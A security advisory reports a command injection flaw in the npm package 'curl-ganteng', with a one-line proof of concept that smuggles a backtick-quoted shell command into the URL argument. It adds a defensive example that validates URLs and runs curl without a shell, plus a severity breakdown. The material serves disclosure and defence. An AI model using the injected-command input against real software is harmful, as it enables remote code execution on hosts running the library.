Command Injection Vulnerability In Curl-Ganteng - CVE-2021-31896 / CX-2021-4779


Severity: 9.8 - Critical Severity

Summary

Affected versions of the `curl-ganteng` npm package are vulnerable to command injection in the `curl` function.


All versions of the `curl-ganteng` npm package are affected.


This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.

Steps To Reproduce

Run the following PoC:

var curl = require('curl-ganteng')
curl.curl("' `mkdir pwnd`'").catch((a) => {console.log(a)}).then((a) => {console.log(a)})

Expected Result:

A new folder named ‘pwnd’ will be created.


Currently, no fixed version has been released. As a workaround, avoid passing untrusted input into the vulnerable parameters when using the library.
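
One way to apply this workaround in calling code, as an added example that is not from the advisory or from the package: validate the URL, then start `curl` with an argument array so that no shell parses it. All function names are hypothetical, and the string-concatenation pattern in `unsafeCommandLine` is an assumption, since the advisory does not show the package source.

```javascript
// Added example: the names below are hypothetical, not curl-ganteng's API.
const { execFile, execFileSync } = require('node:child_process');

// ASSUMED vulnerable pattern (the advisory does not show the package source):
// the URL is pasted into a shell command line. Returned as a string only,
// never executed here.
function unsafeCommandLine(url) {
  return "curl '" + url + "'"; // a string like this would go to child_process.exec()
}

// Hardened: validate first, then build an argv array for execFile().
function buildCurlArgv(input) {
  if (typeof input !== 'string') throw new TypeError('URL must be a string');
  const url = new URL(input); // throws on anything that is not an absolute URL
  if (url.protocol !== 'http:' && url.protocol !== 'https:') {
    throw new Error('unsupported scheme: ' + url.protocol);
  }
  // href always starts with http:// or https://, so curl cannot read it as an option.
  return ['-sS', '--proto', '=http,https', url.href];
}

// execFile() starts curl directly with no shell, so quotes and backticks
// in an argument are plain bytes. Invalid input rejects the promise.
function safeCurl(input) {
  return new Promise((resolve, reject) => {
    execFile('curl', buildCurlArgv(input), { timeout: 10000 },
      (err, stdout) => (err ? reject(err) : resolve(stdout)));
  });
}

// Offline check: hand a string to a child process through execFile and
// return exactly what the child received as its last argument.
function argSeenByChild(arg) {
  const script = 'process.stdout.write(process.argv[process.argv.length - 1])';
  return execFileSync(process.execPath, ['-e', script, arg], { encoding: 'utf8' });
}

const POC_INPUT = "' `mkdir pwnd`'"; // the input string from the PoC above
```

`buildCurlArgv(POC_INPUT)` throws before any process is started, and `argSeenByChild(POC_INPUT)` returns the string unchanged, which shows that an `execFile` argument is never interpreted by a shell.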


Attack Vector: Network

Attack Complexity: Low

Privileges Required: None

User Interaction: None

Scope: Unchanged

Confidentiality: High

Integrity: High

Availability: High


This issue was discovered and reported by Checkmarx SCA Security Researcher Yaniv Nizry.

